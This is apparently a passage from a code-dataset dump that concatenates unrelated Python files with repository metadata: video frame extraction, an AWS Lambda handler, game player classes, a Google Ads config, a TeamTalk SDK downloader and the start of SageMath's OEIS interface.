if not os.path.isfile(videoname):
videoname = vidDir+'v_'+videoId+'.mkv'
print storageDir,' ecount ',ecount,videoInfo['subset']
numfs = videoInfo['numf']
framelabels = np.ones(numfs,dtype='uint16')*200;
imgname = storageDir+str(numfs-1).zfill(5)+".jpg"
if os.path.isfile(imgname):
movefiles(storageDir,framelabels,numfs)
else:
dst = storageDir+str(numfs-1).zfill(5)+'-ActId'+str(framelabels[-1]).zfill(3)+'.jpg'
if not os.path.isfile(dst):
numf,width,height,fps,cap = getVidedInfo(videoname)
if not cap == -1 and numf == numfs:
newW=256;newH=256;
framecount = 0;
if cap.isOpened():
if not os.path.isdir(storageDir):
os.mkdir(storageDir)
for ind in xrange(numf):
label = framelabels[ind]
dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
retval,image = cap.read()
if not image is None:
resizedImage = cv2.resize(image,(newW,newH))
cv2.imwrite(dst,resizedImage)
else:
cv2.imwrite(dst,resizedImage)
print ' . ',
print dst , 'is created'
else:
with open('vids/'+videoId+'.txt','wb') as f:
f.write('error')
else:
print dst , 'is already there'
def convertVideos():
print "this is convertVideos function"
r(vidDir)
vidlist = [vid for vid in vidlist if vid.startswith("v_")]
print "Number of sucessfully donwloaded ",len(vidlist)
vcount =0
for videname in reversed(vidlist):
vcount+=1
if vcount>0:
src = vidDir+videname
numf,width,height,fps,cap = getVidedInfo(src)
if not cap == -1:
newW=256;newH=256;
print videname, width,height,' and newer are ',newW,newH, ' fps ',fps,' numf ', numf, ' vcount ',vcount
framecount = 0;
storageDir = imgDir+videname.split('.')[0]+"/"
imgname = storageDir+str(numf-1).zfill(5)+".jpg"
if not os.path.isfile(imgname):
if cap.isOpened():
if not os.path.isdir(storageDir):
os.mkdir(storageDir)
for f in xrange(numf):
retval,image = cap.read()
if not image is None:
resizedImage = cv2.resize(image,(newW,newH))
imgname = storageDir+str(framecount).zfill(5)+".jpg"
cv2.imwrite(imgname,resizedImage)
else:
imgname = storageDir+str(framecount).zfill(5)+".jpg"
cv2.imwrite(imgname,resizedImage)
print 'we have missing frame ',framecount
framecount+=1
print imgname
else:
with open('vids/'+videname.split('.')[0]+'.txt','wb') as f:
f.write('error')
def getframelabels4both(annotations,numf,subset):
framelabels = np.ones(numf,dtype='uint16')*200;
if subset == 'testing':
return framelabels
for annot in annotations:
actionId = annot['class']
startframe = annot['sf']
endframe = annot['ef']
framelabels[startframe:endframe] = int(actionId)-1
return framelabels
def genVideoImageLists():
subset = 'testing'
print "this is genVideoImageLists function"
ecount = 0; vcount = 0;
listname = '{}lists/{}.list'.format(baseDir,subset)
fid = open(listname,'wb')
with open(annotPklFile,'rb') as f:
actNetDB = pickle.load(f)
actionIDs = actNetDB['actionIDs']; taxonomy=actNetDB['taxonomy']; database = actNetDB['database'];
for videoId in database.keys():
ecount+=1
if ecount>0:
videoInfo = database[videoId]
if not videoInfo['isnull'] and videoInfo['subset'] == subset:
vcount+=1
storageDir = imgDir+'v_'+videoId+"/"
videlistName = '{}lists/{}/v_{}.list'.format(baseDir,subset,videoId)
fid.write(videlistName+'\n');
vfid = open(videlistName,'wb');
print storageDir,' ecount ',ecount,videoInfo['subset']
numfs = videoInfo['numf']
annotations = videoInfo['annotations']
framelabels = getframelabels4both(annotations,numfs,subset)
dst = storageDir+str(numfs-1).zfill(5)+'-ActId'+str(framelabels[-1]).zfill(3)+'.jpg'
if os.path.isfile(dst):
for ind in xrange(numfs):
label = framelabels[ind]
dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
vfid.write(dst+'\n')
else:
RuntimeError('check if file exists '+dst)
def checkConverted():
print "this is checkConverted videos function"
vidlist = os.listdir(vidDir)
vidlist = [vid for vid in vidlist if vid.endswith(".mp4")]
print "Number of sucessfully donwloaded ",len(vidlist)
vcount =0
for videname in vidlist[15000:]:
src = vidDir+videname
numF = getNumFrames(src)
if numF>0:
imgname = imgDir+videname.split('.')[0]+"/"+str(numF-1).zfill(5)+".jpg"
print 'last frame is ',imgname,' vocunt ',vcount
vcount+=1
dst = vidDirtemp+videname
if not os.path.isfile(imgname):
shutil.move(src,dst)
print " moved this one to ", dst
if __name__=="__main__":
genVideoImageLists()
| false | true |
790102022efed7168bc92fc88fb475e451756dca | 896 | py | Python | packages/@aws-cdk-containers/ecs-service-extensions/lib/extensions/assign-public-ip/lambda/index.py | RichiCoder1/aws-cdk | 626e6aa1a27feffe7ce60a46a6fdcf26f317eaef | [
"Apache-2.0"
] | 6,159 | 2019-07-11T16:53:02.000Z | 2022-03-31T20:52:53.000Z | packages/@aws-cdk-containers/ecs-service-extensions/lib/extensions/assign-public-ip/lambda/index.py | RichiCoder1/aws-cdk | 626e6aa1a27feffe7ce60a46a6fdcf26f317eaef | [
"Apache-2.0"
] | 16,881 | 2019-07-11T18:58:07.000Z | 2022-03-31T23:59:47.000Z | packages/@aws-cdk-containers/ecs-service-extensions/lib/extensions/assign-public-ip/lambda/index.py | RichiCoder1/aws-cdk | 626e6aa1a27feffe7ce60a46a6fdcf26f317eaef | [
"Apache-2.0"
] | 2,504 | 2019-07-11T17:52:52.000Z | 2022-03-31T21:19:53.000Z | import logging
import os
import boto3
from lib.cleanup_resource_handler import CleanupResourceHandler
from lib.queue_handler import QueueHandler
logging.getLogger().setLevel(logging.INFO)
def queue_handler(event, context):
"""
Handler for the event queue lambda trigger
"""
ec2_client = boto3.client('ec2')
dynamodb_resource = boto3.resource('dynamodb')
route53_client = boto3.client('route53')
handler = QueueHandler(ec2_client=ec2_client, dynamodb_resource=dynamodb_resource, route53_client=route53_client,
environ=os.environ)
return handler.handle(event, context)
def cleanup_resource_handler(event, context):
"""
Event handler for the custom resource.
"""
route53_client = boto3.client('route53')
handler = CleanupResourceHandler(route53_client=route53_client)
handler.handle_event(event, context)
| 25.6 | 117 | 0.737723 | import logging
import os
import boto3
from lib.cleanup_resource_handler import CleanupResourceHandler
from lib.queue_handler import QueueHandler
logging.getLogger().setLevel(logging.INFO)
def queue_handler(event, context):
ec2_client = boto3.client('ec2')
dynamodb_resource = boto3.resource('dynamodb')
route53_client = boto3.client('route53')
handler = QueueHandler(ec2_client=ec2_client, dynamodb_resource=dynamodb_resource, route53_client=route53_client,
environ=os.environ)
return handler.handle(event, context)
def cleanup_resource_handler(event, context):
route53_client = boto3.client('route53')
handler = CleanupResourceHandler(route53_client=route53_client)
handler.handle_event(event, context)
| true | true |
79010271145bee87268177e76443c8d48acc66a9 | 2,781 | py | Python | src/Player.py | ForgedSnow/Frontiersman | c564238b120bd9a526a2ebd6b79ed5b021be2a6e | [
"MIT"
] | null | null | null | src/Player.py | ForgedSnow/Frontiersman | c564238b120bd9a526a2ebd6b79ed5b021be2a6e | [
"MIT"
] | null | null | null | src/Player.py | ForgedSnow/Frontiersman | c564238b120bd9a526a2ebd6b79ed5b021be2a6e | [
"MIT"
] | null | null | null | class PlayerResourceHand:
def __init__(self):
self.brick = 0
self.grain = 0
self.lumber = 0
self.ore = 0
self.wool = 0
self.totalResources = 0
def update(self):
self.totalResources = self.brick + self.grain + self.lumber + self.ore + self.wool
class PlayerDevelopmentHand:
def __init__(self):
self.knights = 0
self.roadBuildings = 0
self.yearOfPlenty = 0
self.monopolies = 0
self.victoryPoints = 0
self.totalDevelopments = 0
def update(self):
self.totalDevelopments = self.knights + self.roadBuildings + self.yearOfPlenty + self.monopolies \
+ self.victoryPoints
class EnemyPlayer:
def __init__(self, turnOrder, name, color, nR, nS, nC, lR, lA, hS, dS, vVP):
self.turnOrder = turnOrder
self.name = name
self.color = color
self.handSize = hS
self.developmentSize = dS
self.visibleVictoryPoints = vVP
self.numRoads = nR
self.numSettlements = nS
self.numCities = nC
self.longestRoad = lR
self.largestArmy = lA
class Player:
def __init__(self, name, color, turnOrder):
self.color = color
self.name = name
self.turnOrder = turnOrder
self.numRoads = 15
self.numSettlements = 5
self.numCities = 4
self.longestRoad = 0
self.largestArmy = 0
self.victoryPoints = 0
self.resourceHand = PlayerResourceHand()
self.developmentHand = PlayerDevelopmentHand()
self.ownedRoads = list()
self.ownedNodes = list()
def getNumResources(self):
return self.resourceHand.totalResources
def getNumDevelopment(self):
return self.developmentHand.totalDevelopments
def getSendToEnemies(self):
# toSend = EnemyPlayer(self.turnOrder, self.name, self.color,
# self.numRoads, self.numSettlements, self.numCities,
# self.longestRoad, self.largestArmy)
toSend = ','.join([self.turnOrder, self.name, self.color, self.numRoads, self.numSettlements, self.numCities,
self.longestRoad, self.largestArmy])
return toSend
def acquireRoad(self, road):
self.ownedRoads.append(road)
def acquireNode(self, node):
self.ownedNodes.append(node)
def addResources(self, array):
self.resourceHand.brick += array[0]
self.resourceHand.grain += array[1]
self.resourceHand.lumber += array[2]
self.resourceHand.ore += array[3]
self.resourceHand.wool += array[4]
self.resourceHand.totalResources += array[0] + array[1] + array[2] + array[3] + array[4]
| 32.337209 | 117 | 0.607695 | class PlayerResourceHand:
def __init__(self):
self.brick = 0
self.grain = 0
self.lumber = 0
self.ore = 0
self.wool = 0
self.totalResources = 0
def update(self):
self.totalResources = self.brick + self.grain + self.lumber + self.ore + self.wool
class PlayerDevelopmentHand:
def __init__(self):
self.knights = 0
self.roadBuildings = 0
self.yearOfPlenty = 0
self.monopolies = 0
self.victoryPoints = 0
self.totalDevelopments = 0
def update(self):
self.totalDevelopments = self.knights + self.roadBuildings + self.yearOfPlenty + self.monopolies \
+ self.victoryPoints
class EnemyPlayer:
def __init__(self, turnOrder, name, color, nR, nS, nC, lR, lA, hS, dS, vVP):
self.turnOrder = turnOrder
self.name = name
self.color = color
self.handSize = hS
self.developmentSize = dS
self.visibleVictoryPoints = vVP
self.numRoads = nR
self.numSettlements = nS
self.numCities = nC
self.longestRoad = lR
self.largestArmy = lA
class Player:
def __init__(self, name, color, turnOrder):
self.color = color
self.name = name
self.turnOrder = turnOrder
self.numRoads = 15
self.numSettlements = 5
self.numCities = 4
self.longestRoad = 0
self.largestArmy = 0
self.victoryPoints = 0
self.resourceHand = PlayerResourceHand()
self.developmentHand = PlayerDevelopmentHand()
self.ownedRoads = list()
self.ownedNodes = list()
def getNumResources(self):
return self.resourceHand.totalResources
def getNumDevelopment(self):
return self.developmentHand.totalDevelopments
def getSendToEnemies(self):
toSend = ','.join([self.turnOrder, self.name, self.color, self.numRoads, self.numSettlements, self.numCities,
self.longestRoad, self.largestArmy])
return toSend
def acquireRoad(self, road):
self.ownedRoads.append(road)
def acquireNode(self, node):
self.ownedNodes.append(node)
def addResources(self, array):
self.resourceHand.brick += array[0]
self.resourceHand.grain += array[1]
self.resourceHand.lumber += array[2]
self.resourceHand.ore += array[3]
self.resourceHand.wool += array[4]
self.resourceHand.totalResources += array[0] + array[1] + array[2] + array[3] + array[4]
| true | true |
790105945b5bef769bbf33300bcce00966e4713d | 711 | py | Python | example.py | ildoonet/remote-dataloader | 2d51ed883f57632fef08f1475221641f48a0adea | [
"MIT"
] | 64 | 2019-10-09T02:35:48.000Z | 2021-09-22T11:54:03.000Z | example.py | ildoonet/remote-dataloader | 2d51ed883f57632fef08f1475221641f48a0adea | [
"MIT"
] | null | null | null | example.py | ildoonet/remote-dataloader | 2d51ed883f57632fef08f1475221641f48a0adea | [
"MIT"
] | 2 | 2021-05-01T13:13:31.000Z | 2021-07-26T04:54:16.000Z | import torchvision as torchvision
from torchvision.transforms import transforms
from tqdm import tqdm
from remote_dataloader.loader import RemoteDataLoader
if __name__ == '__main__':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
total_trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)
loader = RemoteDataLoader(total_trainset, batch_size=32, timeout=5)
for epoch in range(5):
for img, lb in tqdm(loader):
pass
| 33.857143 | 118 | 0.708861 | import torchvision as torchvision
from torchvision.transforms import transforms
from tqdm import tqdm
from remote_dataloader.loader import RemoteDataLoader
if __name__ == '__main__':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
total_trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)
loader = RemoteDataLoader(total_trainset, batch_size=32, timeout=5)
for epoch in range(5):
for img, lb in tqdm(loader):
pass
| true | true |
790105aadf839cb9fdee284f67b7515e1f3e0deb | 1,191 | py | Python | google/ads/google_ads/v1/services/customer_feed_service_client_config.py | jiulongw/google-ads-python | 6f5256eb1eeb5a9a95c8cdb9b97988d3a676282e | [
"Apache-2.0"
] | 1 | 2019-11-30T23:42:39.000Z | 2019-11-30T23:42:39.000Z | google/ads/google_ads/v1/services/customer_feed_service_client_config.py | jiulongw/google-ads-python | 6f5256eb1eeb5a9a95c8cdb9b97988d3a676282e | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/v1/services/customer_feed_service_client_config.py | jiulongw/google-ads-python | 6f5256eb1eeb5a9a95c8cdb9b97988d3a676282e | [
"Apache-2.0"
] | 1 | 2020-03-13T00:14:31.000Z | 2020-03-13T00:14:31.000Z | config = {
"interfaces": {
"google.ads.googleads.v1.services.CustomerFeedService": {
"retry_codes": {
"idempotent": ["DEADLINE_EXCEEDED", "UNAVAILABLE"],
"non_idempotent": []
},
"retry_params": {
"default": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
}
},
"methods": {
"GetCustomerFeed": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default"
},
"MutateCustomerFeeds": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default"
}
}
}
}
}
| 35.029412 | 67 | 0.438287 | config = {
"interfaces": {
"google.ads.googleads.v1.services.CustomerFeedService": {
"retry_codes": {
"idempotent": ["DEADLINE_EXCEEDED", "UNAVAILABLE"],
"non_idempotent": []
},
"retry_params": {
"default": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
}
},
"methods": {
"GetCustomerFeed": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default"
},
"MutateCustomerFeeds": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default"
}
}
}
}
}
| true | true |
790106627f39c9d181898047c1ca44efdac4def0 | 3,906 | py | Python | tools/ttsdk_downloader.py | ahmetecevitli/TTMediaBot | 94297955156dedbba8ce385efcdd1d4c0a921ac4 | [
"MIT"
] | 30 | 2021-05-12T10:23:41.000Z | 2022-03-31T10:13:42.000Z | tools/ttsdk_downloader.py | ahmetecevitli/TTMediaBot | 94297955156dedbba8ce385efcdd1d4c0a921ac4 | [
"MIT"
] | 29 | 2021-05-12T17:47:09.000Z | 2022-02-19T11:45:23.000Z | tools/ttsdk_downloader.py | ahmetecevitli/TTMediaBot | 94297955156dedbba8ce385efcdd1d4c0a921ac4 | [
"MIT"
] | 36 | 2021-05-12T14:58:15.000Z | 2022-03-31T10:06:52.000Z | #!/usr/bin/env python3
import os
import platform
import shutil
import sys
from urllib import request
import bs4
import patoolib
url = "http://bearware.dk/teamtalksdk"
cd = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def get_url_suffix_from_platform() -> str:
machine = platform.machine()
if sys.platform == "win32":
architecture = platform.architecture()
if machine == "AMD64" or machine == "x86":
if architecture[0] == "64bit":
return "win64"
else:
return "win32"
else:
sys.exit("Native Windows on ARM is not suported")
elif sys.platform == "darwin":
sys.exit("Darwin is not supported")
else:
if machine == "AMD64" or machine == "x86_64":
return "ubuntu18_x86_64"
elif "arm" in machine:
return "raspbian_armhf"
else:
sys.exit("Your architecture is not supported")
def download() -> None:
r = request.urlopen(url)
html = r.read().decode("UTF-8")
page = bs4.BeautifulSoup(html, features="html.parser")
versions = page.find_all("li")
last_version = versions[-1].a.get("href")[0:-1]
download_url = (
url
+ "/"
+ last_version
+ "/"
+ "tt5sdk_{v}_{p}.7z".format(v=last_version, p=get_url_suffix_from_platform())
)
print("Downloading from " + download_url)
request.urlretrieve(download_url, os.path.join(cd, "ttsdk.7z"))
def extract() -> None:
try:
os.mkdir(os.path.join(cd, "ttsdk"))
except FileExistsError:
shutil.rmtree(os.path.join(cd, "ttsdk"))
os.mkdir(os.path.join(cd, "ttsdk"))
patoolib.extract_archive(
os.path.join(cd, "ttsdk.7z"), outdir=os.path.join(cd, "ttsdk")
)
def move() -> None:
path = os.path.join(cd, "ttsdk", os.listdir(os.path.join(cd, "ttsdk"))[0])
try:
if sys.platform == "win32":
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/TeamTalk5.dll"),
os.path.join(cd, "TeamTalk5.dll"),
)
else:
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/libTeamTalk5.so"),
os.path.join(cd, "libTeamTalk5.so"),
)
except FileExistsError:
if sys.platform == "win32":
os.remove(os.path.join(cd, "TeamTalk5.dll"))
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/TeamTalk5.dll"),
os.path.join(cd, "TeamTalk5.dll"),
)
else:
os.remove(os.path.join(cd, "libTeamTalk5.so"))
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/libTeamTalk5.so"),
os.path.join(cd, "libTeamTalk5.so"),
)
try:
os.rename(
os.path.join(path, "Library/TeamTalkPy"), os.path.join(cd, "TeamTalkPy")
)
except OSError:
shutil.rmtree(os.path.join(cd, "TeamTalkPy"))
os.rename(
os.path.join(path, "Library/TeamTalkPy"), os.path.join(cd, "TeamTalkPy")
)
try:
os.rename(
os.path.join(path, "License.txt"), os.path.join(cd, "TTSDK_license.txt")
)
except FileExistsError:
os.remove(os.path.join(cd, "TTSDK_license.txt"))
os.rename(
os.path.join(path, "License.txt"), os.path.join(cd, "TTSDK_license.txt")
)
def clean() -> None:
os.remove(os.path.join(cd, "ttsdk.7z"))
shutil.rmtree(os.path.join(cd, "ttsdk"))
def install() -> None:
print("Installing TeamTalk sdk components")
print("Downloading latest sdk version")
download()
print("Downloaded. extracting")
extract()
print("Extracted. moving")
move()
print("moved. cleaning")
clean()
print("cleaned.")
print("Installed")
if __name__ == "__main__":
install()
| 28.933333 | 86 | 0.569636 |
import os
import platform
import shutil
import sys
from urllib import request
import bs4
import patoolib
url = "http://bearware.dk/teamtalksdk"
cd = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def get_url_suffix_from_platform() -> str:
machine = platform.machine()
if sys.platform == "win32":
architecture = platform.architecture()
if machine == "AMD64" or machine == "x86":
if architecture[0] == "64bit":
return "win64"
else:
return "win32"
else:
sys.exit("Native Windows on ARM is not suported")
elif sys.platform == "darwin":
sys.exit("Darwin is not supported")
else:
if machine == "AMD64" or machine == "x86_64":
return "ubuntu18_x86_64"
elif "arm" in machine:
return "raspbian_armhf"
else:
sys.exit("Your architecture is not supported")
def download() -> None:
r = request.urlopen(url)
html = r.read().decode("UTF-8")
page = bs4.BeautifulSoup(html, features="html.parser")
versions = page.find_all("li")
last_version = versions[-1].a.get("href")[0:-1]
download_url = (
url
+ "/"
+ last_version
+ "/"
+ "tt5sdk_{v}_{p}.7z".format(v=last_version, p=get_url_suffix_from_platform())
)
print("Downloading from " + download_url)
request.urlretrieve(download_url, os.path.join(cd, "ttsdk.7z"))
def extract() -> None:
try:
os.mkdir(os.path.join(cd, "ttsdk"))
except FileExistsError:
shutil.rmtree(os.path.join(cd, "ttsdk"))
os.mkdir(os.path.join(cd, "ttsdk"))
patoolib.extract_archive(
os.path.join(cd, "ttsdk.7z"), outdir=os.path.join(cd, "ttsdk")
)
def move() -> None:
path = os.path.join(cd, "ttsdk", os.listdir(os.path.join(cd, "ttsdk"))[0])
try:
if sys.platform == "win32":
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/TeamTalk5.dll"),
os.path.join(cd, "TeamTalk5.dll"),
)
else:
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/libTeamTalk5.so"),
os.path.join(cd, "libTeamTalk5.so"),
)
except FileExistsError:
if sys.platform == "win32":
os.remove(os.path.join(cd, "TeamTalk5.dll"))
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/TeamTalk5.dll"),
os.path.join(cd, "TeamTalk5.dll"),
)
else:
os.remove(os.path.join(cd, "libTeamTalk5.so"))
os.rename(
os.path.join(path, "Library/TeamTalk_DLL/libTeamTalk5.so"),
os.path.join(cd, "libTeamTalk5.so"),
)
try:
os.rename(
os.path.join(path, "Library/TeamTalkPy"), os.path.join(cd, "TeamTalkPy")
)
except OSError:
shutil.rmtree(os.path.join(cd, "TeamTalkPy"))
os.rename(
os.path.join(path, "Library/TeamTalkPy"), os.path.join(cd, "TeamTalkPy")
)
try:
os.rename(
os.path.join(path, "License.txt"), os.path.join(cd, "TTSDK_license.txt")
)
except FileExistsError:
os.remove(os.path.join(cd, "TTSDK_license.txt"))
os.rename(
os.path.join(path, "License.txt"), os.path.join(cd, "TTSDK_license.txt")
)
def clean() -> None:
os.remove(os.path.join(cd, "ttsdk.7z"))
shutil.rmtree(os.path.join(cd, "ttsdk"))
def install() -> None:
print("Installing TeamTalk sdk components")
print("Downloading latest sdk version")
download()
print("Downloaded. extracting")
extract()
print("Extracted. moving")
move()
print("moved. cleaning")
clean()
print("cleaned.")
print("Installed")
if __name__ == "__main__":
install()
| true | true |
79010884e27cc910e075ae5bea295557189b9232 | 73,566 | py | Python | src/sage/databases/oeis.py | tashakim/sage | 467fbc70a08b552b3de33d9065204ee9cbfb02c7 | [
"BSL-1.0"
] | 4 | 2020-07-17T04:49:44.000Z | 2020-07-29T06:33:51.000Z | src/sage/databases/oeis.py | Ivo-Maffei/sage | 467fbc70a08b552b3de33d9065204ee9cbfb02c7 | [
"BSL-1.0"
] | null | null | null | src/sage/databases/oeis.py | Ivo-Maffei/sage | 467fbc70a08b552b3de33d9065204ee9cbfb02c7 | [
"BSL-1.0"
] | null | null | null | # -*- coding: utf-8 -*-
r"""
The On-Line Encyclopedia of Integer Sequences (OEIS)
You can query the OEIS (Online Database of Integer Sequences) through Sage in
order to:
- identify a sequence from its first terms.
- obtain more terms, formulae, references, etc. for a given sequence.
AUTHORS:
- Thierry Monteil (2012-02-10 -- 2013-06-21): initial version.
- Vincent Delecroix (2014): modifies continued fractions because of :trac:`14567`
- Moritz Firsching (2016): modifies handling of dead sequence, see :trac:`17330`
- Thierry Monteil (2019): refactorization (unique representation :trac:`28480`,
laziness :trac:`28627`)
EXAMPLES::
sage: oeis
The On-Line Encyclopedia of Integer Sequences (https://oeis.org/)
What about a sequence starting with `3, 7, 15, 1` ?
::
sage: search = oeis([3, 7, 15, 1], max_results=4) ; search # optional -- internet
0: A001203: Simple continued fraction expansion of Pi.
1: A240698: Partial sums of divisors of n, cf. A027750.
2: A082495: a(n) = (2^n - 1) mod n.
3: A165416: Irregular array read by rows: The n-th row contains those distinct positive integers that each, when written in binary, occurs as a substring in binary n.
sage: [u.id() for u in search] # optional -- internet
['A001203', 'A240698', 'A082495', 'A165416']
sage: c = search[0] ; c # optional -- internet
A001203: Simple continued fraction expansion of Pi.
::
sage: c.first_terms(15) # optional -- internet
(3, 7, 15, 1, 292, 1, 1, 1, 2, 1, 3, 1, 14, 2, 1)
sage: c.examples() # optional -- internet
0: Pi = 3.1415926535897932384...
1: = 3 + 1/(7 + 1/(15 + 1/(1 + 1/(292 + ...))))
2: = [a_0; a_1, a_2, a_3, ...] = [3; 7, 15, 1, 292, ...]
sage: c.comments() # optional -- internet
0: The first 5821569425 terms were computed by _Eric W. Weisstein_ on Sep 18 2011.
1: The first 10672905501 terms were computed by _Eric W. Weisstein_ on Jul 17 2013.
2: The first 15000000000 terms were computed by _Eric W. Weisstein_ on Jul 27 2013.
::
sage: x = c.natural_object() ; type(x) # optional -- internet
<class 'sage.rings.continued_fraction.ContinuedFraction_periodic'>
sage: x.convergents()[:7] # optional -- internet
[3, 22/7, 333/106, 355/113, 103993/33102, 104348/33215, 208341/66317]
sage: RR(x.value()) # optional -- internet
3.14159265358979
sage: RR(x.value()) == RR(pi) # optional -- internet
True
What about posets ? Are they hard to count ? To which other structures are they
related ?
::
sage: [Posets(i).cardinality() for i in range(10)]
[1, 1, 2, 5, 16, 63, 318, 2045, 16999, 183231]
sage: oeis(_) # optional -- internet
0: A000112: Number of partially ordered sets ("posets") with n unlabeled elements.
sage: p = _[0] # optional -- internet
::
sage: 'hard' in p.keywords() # optional -- internet
True
sage: len(p.formulas()) # optional -- internet
0
sage: len(p.first_terms()) # optional -- internet
17
::
sage: p.cross_references(fetch=True) # optional -- internet
0: A000798: Number of different quasi-orders (or topologies, or transitive digraphs) with n labeled elements.
1: A001035: Number of partially ordered sets ("posets") with n labeled elements (or labeled acyclic transitive digraphs).
2: A001930: Number of topologies, or transitive digraphs with n unlabeled nodes.
3: A006057: Number of topologies on n labeled points satisfying axioms T_0-T_4.
4: A079263: Number of constrained mixed models with n factors.
5: A079265: Number of antisymmetric transitive binary relations on n unlabeled points.
6: A263859: Triangle read by rows: T(n,k) (n>=1, k>=0) is the number of posets with n elements and rank k (or depth k+1).
7: A316978: Number of factorizations of n into factors > 1 with no equivalent primes.
8: A319559: Number of non-isomorphic T_0 set systems of weight n.
9: A326939: Number of T_0 sets of subsets of {1..n} that cover all n vertices.
10: A326943: Number of T_0 sets of subsets of {1..n} that cover all n vertices and are closed under intersection.
...
What does the Taylor expansion of the `e^{e^x-1}` function have to do with
primes ?
::
sage: x = var('x') ; f(x) = e^(e^x - 1)
sage: L = [a*factorial(b) for a,b in taylor(f(x), x, 0, 20).coefficients()] ; L
[1, 1, 2, 5, 15, 52, 203, 877, 4140, 21147, 115975, 678570, 4213597,
27644437, 190899322, 1382958545, 10480142147, 82864869804, 682076806159,
5832742205057, 51724158235372]
sage: oeis(L) # optional -- internet
0: A000110: Bell or exponential numbers: number of ways to partition a set of n labeled elements.
1: A292935: E.g.f.: exp(exp(-x) - 1).
sage: b = _[0] # optional -- internet
sage: b.formulas()[0] # optional -- internet
'E.g.f.: exp(exp(x) - 1).'
sage: [i for i in b.comments() if 'prime' in i][-1] # optional -- internet
'Number n is prime if mod(a(n)-2,n) = 0. -_Dmitry Kruchinin_, Feb 14 2012'
sage: [n for n in range(2, 20) if (b(n)-2) % n == 0] # optional -- internet
[2, 3, 5, 7, 11, 13, 17, 19]
.. SEEALSO::
- If you plan to do a lot of automatic searches for subsequences, you
should consider installing :mod:`SloaneEncyclopedia
<sage.databases.sloane>`, a local partial copy of the OEIS.
- Some infinite OEIS sequences are implemented in Sage, via the
:mod:`sloane_functions <sage.combinat.sloane_functions>` module.
.. TODO::
- in case of flood, suggest the user to install the off-line database instead.
- interface with the off-line database (or reimplement it).
Classes and methods
-------------------
"""
# ****************************************************************************
# Copyright (C) 2012 Thierry Monteil <sage!lma.metelu.net>
#
# Distributed under the terms of the GNU General Public License (GPL)
# as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
from __future__ import print_function
from urllib.request import urlopen
from urllib.parse import urlencode
from sage.structure.sage_object import SageObject
from sage.structure.unique_representation import UniqueRepresentation
from sage.cpython.string import bytes_to_str
from sage.rings.integer import Integer
from sage.misc.verbose import verbose
from sage.misc.cachefunc import cached_method
from sage.misc.flatten import flatten
from sage.misc.temporary_file import tmp_filename
from sage.misc.unknown import Unknown
from sage.misc.misc import embedded
from sage.misc.html import HtmlFragment
from sage.repl.preparse import preparse
from collections import defaultdict
import re
oeis_url = 'https://oeis.org/'
def _fetch(url):
r"""
Fetch the given ``url``.
INPUT:
- ``url`` -- a string corresponding to the URL to be fetched.
OUTPUT:
- a string representing the fetched web page.
TESTS::
sage: from sage.databases.oeis import _fetch, oeis_url
sage: _fetch(oeis_url + 'hints.html')[-8:-1] # optional -- internet
'</html>'
"""
try:
verbose("Fetching URL %s ..." % url, caller_name='OEIS')
f = urlopen(url)
result = f.read()
f.close()
return bytes_to_str(result)
except IOError as msg:
raise IOError("%s\nError fetching %s." % (msg, url))
def _urls(html_string):
r"""
Return the list of URLs contained in ``html_string``.
Only URLs provided by HTML hyperlinks (``href`` attribute of ``<a>`` tags)
in are returned, not text strings starting with ``http://``.
INPUT:
- ``html_string`` -- a string representing some HTML code.
OUTPUT:
- a list of (string) URLs contained in ``html_string``.
EXAMPLES::
sage: from sage.databases.oeis import _urls
sage: html = 'http://example.com is not a link, but <a href="http://sagemath.org/">sagemath</a> is'
sage: _urls(html)
['http://sagemath.org/']
"""
urls = []
from html.parser import HTMLParser
class MyHTMLParser(HTMLParser):
def handle_starttag(self, tag, attrs):
if tag == 'a':
for attr in attrs:
if attr[0] == 'href':
urls.append(attr[1])
MyHTMLParser().feed(html_string)
return urls
to_tuple = lambda string: tuple(Integer(x) for x in string.split(",") if x)
class OEIS:
r"""
The On-Line Encyclopedia of Integer Sequences.
``OEIS`` is a class representing the On-Line Encyclopedia of Integer
Sequences. You can query it using its methods, but ``OEIS`` can also be
called directly with three arguments:
- ``query`` - it can be:
- a string representing an OEIS ID (e.g. 'A000045').
- an integer representing an OEIS ID (e.g. 45).
- a list representing a sequence of integers.
- a string, representing a text search.
- ``max_results`` - (integer, default: 30) the maximum number of
results to return, they are sorted according to their relevance. In
